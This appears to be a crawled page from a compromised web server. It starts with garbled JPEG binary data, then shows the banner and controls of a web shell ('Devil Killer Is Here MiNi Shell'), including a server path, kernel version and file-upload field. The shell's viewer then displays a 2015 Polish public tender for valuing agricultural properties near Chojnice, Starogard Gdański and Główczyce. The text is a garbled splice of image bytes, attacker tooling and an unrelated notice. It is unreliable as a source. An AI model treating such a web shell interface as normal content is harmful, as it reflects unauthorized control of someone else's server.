JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150129/20418-N-2015.html

<p class="kh_header"><b>Pruszcz Gdański: Wycena nieruchomości rolnych zabudowanych: dz. nr 14/3 i 39/38 o łącznej pow. 93,3003 ha położonych w obrębie Ciechocin, gm. Chojnice, dz. nr 87/1, 85/15, 85/31 o łącznej pow. 49,0045 ha położonych w obrębie Klonówka, gm. Starogard Gdański, dz. nr 27/4 o pow. 8,95 ha położonej w obrębie Dargoleza gm. Główczyce</b><br>
<b>Numer ogłoszenia: 20418 - 2015; data zamieszczenia: 29.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Gdańsku , ul. Powstańców Warszawy 28, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 3004841, 3023817, faks 058 3004843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycena nieruchomości rolnych zabudowanych: dz. nr 14/3 i 39/38 o łącznej pow. 93,3003 ha położonych w obrębie Ciechocin, gm. Chojnice, dz. nr 87/1, 85/15, 85/31 o łącznej pow. 49,0045 ha położonych w obrębie Klonówka, gm. Starogard Gdański, dz. nr 27/4 o pow. 8,95 ha położonej w obrębie Dargoleza gm. Główczyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest wykonanie usługi wyceny nieruchomości rolnej zabudowanej położonej w obrębie Ciechocin gmina Chojnice oznaczonej jako działki nr 14/3 o pow. 56,3826 ha i nr 39/38 o pow. 36,9177 ha o łącznej pow. 93,3003 ha. Nieruchomość zabudowana jest: budynkiem archiwum, oborą testową na 180 stanowisk, budynkiem wagi wozowej, wagą wozową, 
wyceny nieruchomości zabudowanej oznaczonej jako działki nr 87/1, 85/15, 85/31 o łącznej powierzchni 49,0045 ha położonej w obrębie Klonówka gmina Starogard Gdański, powiat starogardzki, zabudowanej budynkami gospodarskimi wraz z pozostałą infrastrukturą techniczną oraz
wyceny nieruchomości rolnej zabudowanej oznaczonej jako działka nr 27/4 o powierzchni 8,9500 ha położonej w gminie Główczyce, obręb Dargoleza, wraz z poniesionymi nakładami.

4.2	Zamówienie zostało podzielone na 3 części, w następujący sposób:
1)	Część 1 - Zadanie Nr 1 - obejmujące wykonanie usługi wyceny nieruchomości rolnej, zabudowanej, położonej w obrębie Ciechocin gmina Chojnice oznaczonej jako działki nr 14/3 o pow. 56,3826 ha i nr 39/38 o pow. 36,9177 ha o łącznej pow. 93,3003 ha. 
Nieruchomość zabudowana jest: 
- budynkiem archiwum, 
- oborą testową na 180 stanowisk - budynek parterowy, niepodpiwniczony z poddaszem o pow. zabudowy 1500 m2,
- budynkiem wagi wozowej - budynek parterowy, niepodpiwniczony o pow. zabudowy 8,96 m2,
- wagą wozową.
Wyrys z mapy ewidencyjnej stanowi załącznik nr 9 do SIWZ.
2) Część 2 - Zadanie Nr 2 - obejmujące wykonanie usługi wyceny nieruchomości zabudowanej oznaczonej jako działki nr 87/1, 85/15, 85/31 o łącznej powierzchni 49,0045 ha położonej w obrębie Klonówka gmina Starogard Gdański, powiat starogardzki, zabudowanej budynkami gospodarskimi wraz z pozostałą infrastrukturą techniczną. 
W skład nieruchomości wchodzą: budynek administracyjny, kuźnia, chlewnia, magazyn zbożowy, stelmacharnia, magazyn nawozów, garaże, chlewnia macior, szopa narzędziowa, magazyn paliw, wiata, warchlakarnia, suszarnia, budynek warchlakarni, skład opału, zbiornik p. poż., gnojownik, płyta gnojowa - 3 szt., ogrodzenie, płyta gnojowa, wiata, linia elektryczna napowietrzna, drogi, komin ceglany, zbiornik paliw, zbiornik, waga wozowa. Obiekty: kuźnia, brama, płatkarnia wpisane są do Gminnej Ewidencji Zabytków Gminy Starogard Gdański.
Wyrys z mapy ewidencyjnej oraz zaświadczenie o przeznaczeniu nieruchomości stanowią załącznik nr 10 i 11 do SIWZ.
3) Część 3 - Zadanie Nr 3 - obejmujące wykonanie usługi wyceny nieruchomości rolnej zabudowanej oznaczonej jako działka nr 27/4 o powierzchni 8,9500 ha położonej w gminie Główczyce, obręb Dargoleza, wraz z poniesionymi nakładami w postaci następujących inwestycji :
a) Rozbudowa budynku biurowo-mieszkalnego wraz z przyłączami kanalizacyjnymi i zbiornikiem bezodpływowym nr II-1-3 - polegająca na wykonaniu robót modernizacyjnych w celu przystosowania budynku do celów biurowo - mieszkalnych, budowy przyłącza kanalizacyjnego oraz instalacji elektrycznej i wodnej,
b) Modernizacja budynku cielętnika nr II-1-32A - polegająca na zbudowaniu żłobów ciągłych ze stołem paszowym,
c) Modernizacja budynku cielętnika nr inw II-1-33D - polegająca na zbudowaniu żłobów ciągłych ze stołem paszowym,
d) Modernizacja budynku opasów  nr inw II-1-35B - modernizacja w celu przystosowania go do hodowli bydła mlecznego tj. wylania i profilowania posadzki betonowej na korytarzu paszowym, zbudowania nowych boksów i kojców, ułożenie instalacji elektrycznej i wodnej,
e) Modernizacja budynku opasów  nr inw II-1-36  - modernizacja przeprowadzona w celu przystosowania go do hodowli bydła mlecznego w systemie wolno stanowiskowym tj. wylania dodatkowej płyty betonowej pod legowiska, zamontowanie boksów, poszerzenie korytarza paszowego, ułożenie instalacji elektrycznej i wodnej,
f) Modernizacja budynku opasów  nr inw II-1-37 - modernizacja przeprowadzona w celu przystosowania go do hodowli bydła mlecznego w systemie wolno stanowiskowym tj. wylania dodatkowej płyty betonowej pod legowiska, zamontowanie boksów, poszerzenie korytarza paszowego, ułożenie instalacji elektrycznej i wodnej,
g) Modernizacja budynku opasów  nr inw II-1-38- modernizacja przeprowadzona w celu przystosowania go do hodowli bydła mlecznego w systemie wolno stanowiskowym tj. wylania dodatkowej płyty betonowej pod legowiska, zamontowanie boksów, poszerzenie korytarza paszowego, ułożenie instalacji elektrycznej i wodnej,
h) Modernizacja budynku gospodarczego warsztatu (budynek padłych zwierząt) nr inw II-1-39 - modernizacja przeprowadzona w celu przystosowania części otwartej do zamontowania hali udojowej, wylanie posadzki betonowej, ułożenie instalacji elektrycznej i wodnej oraz wykonania kablowego zasilania elektrycznego
i) Modernizacja dróg i placów nr inw II-2-23 - polegająca na wykonaniu betonowych ciągów komunikacyjnych łączących obory z halą udojową wraz z korytem dezynfekcyjnym i bramkami
j) Budowa hali udojni części socjalnej
k) Budowa własnego ujęcia wody podziemnej wraz z przyłączem niezbędnym do jego eksploatacji, 
l) Budowa hali udojni części technologicznej
W operacie szacunkowym należy podać wartość nieruchomości wraz z nakładami oraz wartość poszczególnych nakładów. 
Kopia mapy ewidencyjnej i mapa sytuacyjno - wysokościowa - stanowią załącznik nr 12 i 13 do SIWZ.
4.3	W wycenie nieruchomości gruntowych zabudowanych należy podać wartość nieruchomości ogółem w tym wartość gruntu i wartość zabudowań.
4.4	Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego zostały zawarte w projekcie umowy stanowiącym załącznik nr 7 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.90.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje wiedzą i doświadczeniem w wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a) składając ofertę na część 1 - zadanie nr 1 - co najmniej 3 operatów szacunkowych określających wartość rynkową nieruchomości zabudowanych o charakterze rolnym w skład których wchodziły budynki, budowle, infrastruktura techniczna i grunty rolne o powierzchni min. 50,00 ha,
potwierdzone dowodami czy zostały wykonane należycie;
b) składając ofertę na część 2 - zadanie nr 2 - co najmniej 2 operatów szacunkowych określających wartość rynkową nieruchomości zabudowanych o charakterze rolnym, w skład których wchodziły budynki, budowle, infrastruktura techniczna i grunty rolne o powierzchni min. 10,00 ha
potwierdzone dowodami czy zostały wykonane należycie;
c) składając ofertę na część 3 - zadanie nr 3 - co najmniej 2 operatów szacunkowych określających wartość rynkową nieruchomości zabudowanych o charakterze rolnym w skład których wchodziły budynki, budowle, infrastruktura techniczna i grunty o powierzchni min. 5,00 ha,
potwierdzone dowodami czy zostały wykonane należycie;
Ocena spełnienia tego warunku oraz weryfikacja zdolności wykonawcy do należytego wykonania udzielanego zamówienia dokonywana będzie na podstawie oświadczenia zgodnego w treści ze wzorem stanowiącym załącznik nr 2 i
dokumentów wymienionych w ust. 2.2.3 i 2.2.4 Części II SIWZ. Jeżeli z treści tych dokumentów wynikać będzie, że wykonawca spełnia warunek, zamawiający uzna go za spełniony</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 
2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje:
a) składając ofertę na część 1 i 2  - zadanie nr 1 i zadanie nr 2 - co najmniej jedną osobą posiadającą uprawnienia rzeczoznawcy majątkowego do wykonywania prac będących przedmiotem zamówienia zgodnie z ustawą z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tj. Dz.U. z 2014 r., poz. 518 z poźn. zm.),
b) składając ofertę na część 3 - zadanie nr 3 
-    co najmniej jedną osobą posiadającą uprawnienia rzeczoznawcy majątkowego do wykonywania prac będących przedmiotem zamówienia zgodnie z ustawą z dnia 21 sierpnia 1997 r. 
o gospodarce nieruchomościami (tj. Dz.U. z 2014 r., poz. 518 z poźn. zm.),
-   co najmniej jedną osobą posiadającą uprawnienia budowlane w sprawie samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno - budowlanej wydane zgodnie 
z przepisami ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2013 r. poz. 1409 ze zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. z 2014 r., poz. 1278).
Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tj. Dz. U. z 2010 r., Nr 243, poz. 1623 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2008 r., Nr 63, poz. 394).
Wymagane uprawnienia może posiadać jedna osoba lub kilka osób, którymi dysponuje wykonawca.
Ocena
spełnienia tego warunku oraz weryfikacja zdolności wykonawcy do należytego wykonania udzielanego
zamówienia dokonywana będzie na podstawie oświadczenia zgodnego w treści ze wzorem
stanowiącym załącznik nr 2 i dokumentów wymienionych w ust. 2.2.3 i 2.2.4 Części II SIWZ. Jeżeli z treści tych dokumentów wynikać będzie, że wykonawca spełnia warunek, zamawiający uzna go za spełniony</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 
2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a) składając ofertę na część 1 - zadanie nr 1 - co najmniej 3 operatów szacunkowych określających wartość rynkową nieruchomości zabudowanych o charakterze rolnym w skład których wchodziły budynki, budowle, infrastruktura techniczna i grunty rolne o powierzchni min. 50,00 ha,

b) składając ofertę na część 2 - zadanie nr 2 - co najmniej 2 operatów szacunkowych określających wartość rynkową nieruchomości zabudowanych o charakterze rolnym, w skład których wchodziły budynki, budowle, infrastruktura techniczna i grunty rolne o powierzchni min. 10,00 ha

c) składając ofertę na część 3 - zadanie nr 3 - co najmniej 2 operatów szacunkowych określających wartość rynkową nieruchomości zabudowanych o charakterze rolnym w skład których wchodziły budynki, budowle, infrastruktura techniczna i grunty rolne o powierzchni min. 5,00 ha,;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany druk Formularz oferty zgodny w treści z załącznikiem nr 1 do SIWZ. Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania wykonawcy, zgodnie z formą reprezentacji wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej wykonawcy
albo przez upełnomocnionego przedstawiciela wykonawcy. 2. Jeżeli ofertę składa i podpisuje pełnomocnik, do oferty należy dołączyć stosowne pełnomocnictwo, jeżeli umocowanie do złożenia oferty nie wynika z innych
dokumentów dołączonych do oferty.
 3. Jeżeli wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w
szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Podmiot, który zobowiązał się
do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostepnienie zasobów nie ponosi winy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 83-000 Pruszcz Gdański, ul. Powstańców Warszawy 28..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2015 godzina 11:00, miejsce: Sekretariat Agencji Nieruchomości Rolnych Oddziału Terenowego w Gdańsku z siedzibą
w Pruszczu Gdańskim, ul. Powstańców Warszawy 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W kryterium TERMIN WYKONANIA wykonawca może uzyskać maksymalnie 5 pkt. 
1) W przypadku zaoferowania wykonania zlecenia: do 20 dni kalendarzowych od dnia podpisania umowy - Wykonawca otrzyma  5 pkt; 
2) w przypadku zaoferowania wykonania zlecenia: od 20 do 30 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma  0 pkt..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmujące wykonanie usługi wyceny nieruchomości rolnej, zabudowanej, położonej w obrębie Ciechocin gmina Chojnice oznaczonej jako działki nr 14/3 o pow. 56,3826 ha i nr 39/38 o pow. 36,9177 ha o łącznej pow. 93,3003 ha. 
Nieruchomość zabudowana jest: 
- budynkiem archiwum, 
- oborą testową na 180 stanowisk - budynek parterowy, niepodpiwniczony z poddaszem o pow. zabudowy 1500 m2,
- budynkiem wagi wozowej - budynek parterowy, niepodpiwniczony o pow. zabudowy 8,96 m2,
- wagą wozową.
Wyrys z mapy ewidencyjnej stanowi załącznik nr 9 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmujące wykonanie usługi wyceny nieruchomości zabudowanej oznaczonej jako działki nr 87/1, 85/15, 85/31 o łącznej powierzchni 49,0045 ha położonej w obrębie Klonówka gmina Starogard Gdański, powiat starogardzki, zabudowanej budynkami gospodarskimi wraz z pozostałą infrastrukturą techniczną. 
W skład nieruchomości wchodzą: budynek administracyjny, kuźnia, chlewnia, magazyn zbożowy, stelmacharnia, magazyn nawozów, garaże, chlewnia macior, szopa narzędziowa, magazyn paliw, wiata, warchlakarnia, suszarnia, budynek warchlakarni, skład opału, zbiornik p. poż., gnojownik, płyta gnojowa - 3 szt., ogrodzenie, płyta gnojowa, wiata, linia elektryczna napowietrzna, drogi, komin ceglany, zbiornik paliw, zbiornik, waga wozowa. Obiekty: kuźnia, brama, płatkarnia wpisane są do Gminnej Ewidencji Zabytków Gminy Starogard Gdański.
Wyrys z mapy ewidencyjnej oraz zaświadczenie o przeznaczeniu nieruchomości stanowią załącznik nr 10 i 11 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3.</p>
